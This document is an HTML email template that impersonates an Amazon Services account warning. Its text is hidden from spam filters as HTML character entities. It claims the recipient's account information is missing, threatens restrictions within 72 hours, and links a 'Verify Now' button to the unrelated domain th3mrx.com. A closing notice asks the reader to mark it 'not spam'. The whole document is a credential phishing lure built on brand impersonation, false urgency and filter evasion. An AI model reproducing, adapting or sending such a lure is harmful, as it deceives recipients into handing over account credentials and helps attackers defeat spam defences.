<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<table style="background-color: #f3f4f4;" cellspacing="0" cellpadding="0" width="100%"
  align="center" bgcolor="#F3F4F4">
  <tbody>
    <tr>
      <td><br />
      <table style="background-color: #d9dadb;" cellspacing="0" cellpadding="1" align="center"
        bgcolor="#D9DADB">
        <tbody>
          <tr>
            <td>
            <table
              style="font-family: arial, helvetica, sans-serif; font-size: 14px; line-height: 20px; background-color: #ffffff; font-color: black;"
              cellspacing="0" cellpadding="0" width="600" align="center" bgcolor="#ffffff">
              <tbody>
                <tr>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                  <td 
                    style="font-family: arial, helvetica, sans-serif; font-size: 14px; line-height: 20px;">
                  <p><br />
                  <a href="https://www.th3mrx.com/"><img
                    src="https://images-na.ssl-images-amazon.com/images/G/33/amazonservices/mx/as_logo.png" alt="&#65;&#109;&#97;&#122;&#111;&#110; Services" border="0" width="200px"height="50px" /></a> <br />
                  <br />
                  &#68;&#101;&#97;&#114; &#67;&#117;&#115;&#116;&#111;&#109;&#101;&#114;, <br />
                  <br />
                  &#83;&#111;&#109;&#101; &#105;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;&#115; &#111;&#110; 	&#121;&#111;&#117;&#114; &#97;&#99;&#111;&#117;&#110;&#116; &#97;&#112;&#112;&#101;&#97;&#114;&#115; &#116;&#111; &#98;&#101; &#109;&#105;&#115;&#115;&#105;&#110;&#103; &#111;&#114; &#105;&#110;&#99;&#111;&#114;&#114;&#101;&#99;&#116;,  
&#x70;&#108;&#101;&#97;&#115;&#101; &#117;&#112;&#100;&#97;&#116;&#101; &#121;&#111;&#117;&#114; &#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74; &#105;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;&#115;
                   &#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;&#x6C;&#x79;&#x20;&#x73;&#x6F;&#x20;&#x74;&#x68;&#x61;&#x74;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x63;&#x61;&#x6E;&#x20;&#x63;&#x6F;&#x6E;&#x74;&#x69;&#x6E;&#x75;&#x65;&#x20;&#x74;&#x6F;&#x20;&#x65;&#x6E;&#x6A;&#x6F;&#x79;&#x20;&#x61;&#x6C;&#x6C;&#x20;&#x74;&#x68;&#x65; &#98;&#101;&#110;&#101;&#102;&#105;&#116;&#115; of &#121;&#111;&#117;&#114; &#65;&#109;&#97;&#122;&#111;&#110; &#97;&#99;&#99;&#111;&#117;&#110;&#116;.<br /><br />
				   &#73;&#102; &#121;&#111;&#117; &#100;&#111;&#110;'&#116; &#117;&#112;&#100;&#97;&#116;&#101; &#121;&#111;&#117;&#114; &#105;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;&#115; &#x77;&#x69;&#x74;&#x68;&#x69;&#x6E;&#x20;&#x37;&#x32;&#x20;&#x68;&#x6F;&#x75;&#x72;&#x73;&#x20;&#x77;&#x65;&apos;&#x6C;&#x6C;&#x20;&#x6C;&#x69;&#x6D;&#x69;&#x74;&#x20;&#x77;&#x68;&#x61;&#x74;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x63;&#x61;&#x6E;&#x20;&#x64;&#x6F;&#x20;&#x77;&#x69;&#x74;&#x68; &#121;&#111;&#117;&#114; &#65;&#109;&#97;&#122;&#111;&#110; &#97;&#99;&#99;&#111;&#117;&#110;&#116;.
                  <br /><br />
                  <strong>&#x53;&#x69;&#x6D;&#x70;&#x6C;&#x79;&#x20;&#x63;&#x6C;&#x69;&#x63;&#x6B;&#x20;&#x6F;&#x6E;&#x20;&#x74;&#x68;&#x65;&#x20;&#x77;&#x65;&#x62;&#x20;&#x61;&#x64;&#x64;&#x72;&#x65;&#x73;&#x73;&#x20;&#x62;&#x65;&#x6C;&#x6F;&#x77;&#x20;: 
</strong> <br /><br /><span>
                  <a target="_blank" style="font-family: Arial , Helvetica , sans-serif;text-decoration: none;" href="https://www.th3mrx.com/">&#86;&#101;&#114;&#105;&#102;&#121; &#78;&#111;&#119; &gt;</a></span> <br /><br />
                  &#x54;&#x68;&#x61;&#x6E;&#x6B;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x66;&#x6F;&#x72;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x63;&#x6F;&#x6E;&#x63;&#x65;&#x72;&#x6E;.<br />
                  <br />
                  &#x53;&#x69;&#x6E;&#x63;&#x65;&#x72;&#x65;&#x6C;&#x79;,</p>
                  <p>&#65;&#109;&#97;&#122;&#111;&#110; &#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x73;&#x20;&#x54;&#x65;&#x61;&#x6D;<br />
                  <br />
                  </p>
                  </td>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                </tr>
                <tr>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                  <td align="right">
                  <hr size="1px" />
                  </td>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                </tr>
                <tr>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                  <td align="left">
                  <p style="font-size: 9px; color: #999; line-height: 12px; margin-top: 0px; text-align: center; font-family: Arial, Helvetica, sans-serif;"
                    align="center"><br />&#65;&#109;&#97;&#122;&#111;&#110; &#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x73;.&#x20;&#x49;&#x6E;&#x63;.&#x20;&#x69;&#x73;&#x20;&#x61;&#x20;&#x73;&#x75;&#x62;&#x73;&#x69;&#x64;&#x69;&#x61;&#x72;&#x79;&#x20;&#x6F;&#x66;&#x20;&#65;&#109;&#97;&#122;&#111;&#110;.&#x63;&#x6F;&#x6D;.&#x20;&#x49;&#x6E;&#x63;. &#65;&#109;&#97;&#122;&#111;&#110;.&#x63;&#x6F;&#x6D; &#x69;&#x73;&#x20;&#x61;&#x20;&#x72;&#x65;&#x67;&#x69;&#x73;&#x74;&#x65;&#x72;&#x65;&#x64;&#x20;&#x74;&#x72;&#x61;&#x64;&#x65;&#x6D;&#x61;&#x72;&#x6B;&#x20;&#x6F;&#x66; &#65;&#109;&#97;&#122;&#111;&#110;.&#x63;&#x6F;&#x6D;, &#x49;&#x6E;&#x63;.&#x20;&#x54;&#x68;&#x69;&#x73;&#x20;&#x6D;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x70;&#x72;&#x6F;&#x64;&#x75;&#x63;&#x65;&#x64;&#x20;&#x61;&#x6E;&#x64;&#x20;&#x64;&#x69;&#x73;&#x74;&#x72;&#x69;&#x62;&#x75;&#x74;&#x65;&#x64;&#x20;&#x62;&#x79; &#65;&#109;&#97;&#122;&#111;&#110; &#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x73;&#x20;&#x49;&#x6E;&#x63;..&#x20;&#x34;&#x31;&#x30;&#x20;&#x54;&#x65;&#x72;&#x72;&#x79;&#x20;&#x41;&#x76;&#x65;.&#x20;&#x4E;&#x6F;&#x72;&#x74;&#x68;.&#x20;&#x53;&#x65;&#x61;&#x74;&#x74;&#x6C;&#x65;.&#x20;&#x57;&#x41;&#x20;&#x39;&#x38;&#x31;&#x30;&#x39;&#x2D;&#x35;&#x32;&#x31;&#x30;</p>
                  <br />
                  </td>
                  <td width="30"><img style="display: block;"
                    src="http://d36cz9buwru1tt.cloudfront.net/blank.gif" border="0" alt="" width="1"
                    height="1" /></td>
                </tr>

              </tbody>
            </table>
            </td>

          </tr>
        </tbody>
      </table><br />
	  <div align="center" style="color:#F70D1A;" size="9">
	  [&#x4E;&#x6F;&#x74;&#x69;&#x63;&#x65;]&#x20;:&#x20;&#x49;&#x66;&#x20;&#x74;&#x68;&#x69;&#x73;&#x20;&#x65;&#x6D;&#x61;&#x69;&#x6C;&#x20;&#x77;&#x61;&#x73;&#x20;&#x73;&#x65;&#x6E;&#x74;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x69;&#x6E;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x4A;&#x75;&#x6E;&#x6B;&#x20;&#x6F;&#x72;&#x20;&#x53;&#x70;&#x61;&#x6D;&#x20;&#x66;&#x6F;&#x6C;&#x64;&#x65;&#x72;<br /> &#x70;&#x6C;&#x65;&#x61;&#x73;&#x65;&#x20;&#x6D;&#x61;&#x72;&#x6B;&#x20;&#x69;&#x74;&#x20;&#x61;&#x73;&#x20;&#x6E;&#x6F;&#x74;&#x20;&#x73;&#x70;&#x61;&#x6D;&#x20;&#x64;&#x75;&#x65;&#x20;&#x74;&#x6F;&#x20;&#x6F;&#x75;&#x72;&#x20;&#x6E;&#x65;&#x77;&#x20;&#x73;&#x65;&#x63;&#x75;&#x72;&#x69;&#x74;&#x79;&#x20;&#x75;&#x70;&#x64;&#x61;&#x74;&#x65;.
      </div><br /><br /><br />
      </td>
    </tr>
  </tbody>
</table>

</body>
</html>
